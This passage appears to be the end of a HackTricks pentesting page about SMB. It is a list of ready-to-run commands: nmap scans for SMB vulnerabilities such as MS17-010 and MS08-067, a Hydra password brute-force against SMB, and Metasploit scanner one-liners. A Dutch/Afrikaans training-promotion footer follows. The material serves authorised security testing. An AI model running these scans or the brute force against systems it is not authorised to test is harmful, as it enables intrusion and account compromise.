Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
|
||
|
||
Entry_4:
|
||
Name: Nmap Smb Scan 2
|
||
Description: SMB Vuln Scan With Nmap (Less Specific)
|
||
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
|
||
|
||
Entry_5:
|
||
Name: Hydra Brute Force
|
||
Description: Need User
|
||
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
|
||
|
||
Entry_6:
|
||
Name: SMB/SMB2 139/445 consolesless mfs enumeration
|
||
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
|
||
Note: sourced from https://github.com/carlospolop/legion
|
||
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
|
||
|
||
```
|
||
{% hint style="success" %}
|
||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Ondersteun HackTricks</summary>
|
||
|
||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|